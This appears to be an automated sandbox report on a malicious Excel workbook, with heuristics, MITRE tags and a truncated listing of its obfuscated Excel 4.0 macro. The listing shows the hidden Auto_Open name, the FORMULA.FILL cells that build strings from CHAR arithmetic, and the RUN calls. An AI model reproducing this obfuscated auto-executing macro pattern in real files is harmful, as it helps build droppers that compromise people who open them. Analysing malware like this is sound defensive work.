MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open macro that utilizes dangerous functions like FORMULA.FILL and RUN. This indicates the macro is designed to execute arbitrary commands, likely to download and execute a second-stage payload. The specific functions used suggest a capability for arbitrary code execution.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 126368 bytes |
SHA-256: fec3e0cc333456308248b9bf839af4c265edb7689796b85747e375c5a9cd1457 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!JP56538 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,ET27,"",-387.00000000000000000000 ' Sheet,DI60,"",0.11489898989898990334 ' Sheet,DX80,"",-6.65853658536585335526 ' Sheet,HM89,"",-1233.00000000000000000000 ' Sheet,CM135,"",0.06691919191919191989 ' Sheet,HI136,"FORMULA.FILL(CHAR(IX23620+HJ21030)&CHAR(GW8191/EP31778)&CHAR(GW8191/Z15383)&CHAR(ES57153-F28575)&CHAR(FD23243*BA24624)&CHAR(FJ38391-HW40705)&CHAR(FJ38391/GH18825)&CHAR(FH56526*M21719)&CHAR(IX23620*EK45308)&CHAR(IQ8401-FO64536)&CHAR(FA19183*DQ5744)&CHAR(FD23243/GU65340)&CHAR(FJ38391+HE32401)&CHAR(GW8191-DH58173)&CHAR(HV50424-BC53248)&CHAR(FA19183/D6996)&CHAR(FJ38391*FQ12443)&CHAR(FA19183-E55930)&CHAR(FH56526/JS29981)&CHAR(HF61404/HU60974)&CHAR(IX23620/CL39643)&CHAR(FD23243/DK3762)&CHAR(FH56526*DS4617)&CHAR(HV50424-BG63175)&CHAR(IX23620/DX60757)&CHAR(IQ8401-FC12701)&CHAR(GW8191-FT56026)&CHAR(HV50424/HU29721)&CHAR(GW8191+CH3577)&CHAR(IQ8401*FH55986)&CHAR(HF61404-FN10223)&CHAR(GW8191/CU58195)&CHAR(IX23620*HK57622)&CHAR(HF61404-J33493)&CHAR(FH56526/CF31678)&CHAR(HV50424*JC2567)&CHAR(FH56526/CP23600)&CHAR(HV50424*T50483)&CHAR(ES57153+BM38241)&CHAR(HV50424*A35410)&CHAR(FA19183+CD19846)&CHAR(FJ38391*HY46334)&CHAR(FD23243+J8921)&CHAR(FA19183+DC14606)&CHAR(HF61404/DJ11039)&CHAR(FD23243*JN52331)&CHAR(FD23243+D35747)&CHAR(IQ8401+EW47866)&CHAR(ES57153*DU15292)&CHAR(HV50424/CZ47707)&CHAR(FA19183/DI41272)&CHAR(HF61404*CB42660)&CHAR(FJ38391+HP52268)&CHAR(HV50424+IW57930)&CHAR(FJ38391/BI32942)&CHAR(GW8191+FX46326)&CHAR(HF61404+HS43283)&CHAR(FA19183*JT58041)&CHAR(GW8191*FP52849)&CHAR(HF61404-EQ36902)&CHAR(HV50424+EA4870)&CHAR(HF61404+FV64571)&CHAR(GW8191*FB742)&CHAR(FA19183+A47713)&CHAR(FA19183/GM9925)&CHAR(FA19183*CG27558)&CHAR(IQ8401-FE21407)&CHAR(HF61404/R49595)&CHAR(FD23243*HH62258)&CHAR(IQ8401*IH50125)&CHAR(FH56526+CH6448)&CHAR(IQ8401+HY65217)&CHAR(HV50424+FB10005),IO51666)","" ' Sheet,HI137,RUN(HY31532),"" ' Sheet,DD179,"",-0.82500061035156246891 ' Sheet,EO193,"",15.84000976562500007105 ' Sheet,P257,"",-351.00000000000000000000 ' Sheet,JF259,"",-0.59420289855072461194 ' Sheet,HS297,"",-8.19512195121951236843 ' Sheet,EA340,"",429.00000000000000000000 ' Sheet,DG365,"",-0.26737967914438504069 ' Sheet,L395,"",-133.00000000000000000000 ' Sheet,CA399,"",-0.46524064171122997413 ' Sheet,IP532,"",129.00000000000000000000 ' Sheet,CZ548,"",-187.00000000000000000000 ' Sheet,FX566,"",0.57647158823529409677 ' Sheet,GT581,"",0.22982456140350876472 ' Sheet,FJ584,"",-749.00000000000000000000 ' Sheet,IZ655,"",1244.00000000000000000000 ' Sheet,EA684,"",-738.00000000000000000000 ' Sheet,DP693,"",-429.00000000000000000000 ' Sheet,CO707,"",4.54166666666666696273 ' Sheet,FH717,"",-243.00000000000000000000 ' Sheet,U741,"",-2.14942528735632176762 ' Sheet,FB742,"",-0.50000000000000000000 ' Sheet,BN803,"",0.14526315789473684403 ' Sheet,GS938,"",228.50000000000000000000 ' Sheet,HZ1006,"",-5.35294117647058786957 ' Sheet,HI1019,"FORMULA.FILL(CHAR(HF61404-IN43212)&CHAR(FA19183+HC27342)&CHAR(IQ8401*JI14429)&CHAR(FA19183-P33044)&CHAR(IX23620*BE27894)&CHAR(GW8191*HN30973)&CHAR(FA19183/L15384)&CHAR(IQ8401*DD13291)&CHAR(FH56526+HA52672)&CHAR(ES57153+IO29564)&CHAR(HV50424+DA34052)&CHAR(GW8191/V36501)&CHAR(FH56526-GJ12094)&CHAR(FJ38391+BP40233)&CHAR(HF61404/BZ46635)&CHAR(FA19183*HQ49313)&CHAR(HF61404*HE34848)&CHAR(ES57153*BV62862)&CHAR(HF61404+EM24181)&CHAR(FD23243+GA30501)&CHAR(IX23620-HO10294)&CHAR(IX23620+JR46763)&CHAR(HF61404*IN6118)&CHAR(IX23620+CV23444)&CHAR(FA19183+GC22906)&CHAR(FJ38391/EV37055)&CHAR(FA19183-N32578)&CHAR(GW8191/JA28359)&CHAR(FA19183-FM15564)&CHAR(FA19183+BV9113)&CHAR(FH56526/HB4470)&CHAR(IX23620-EM53088)&CHAR(IQ8401+JU4 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.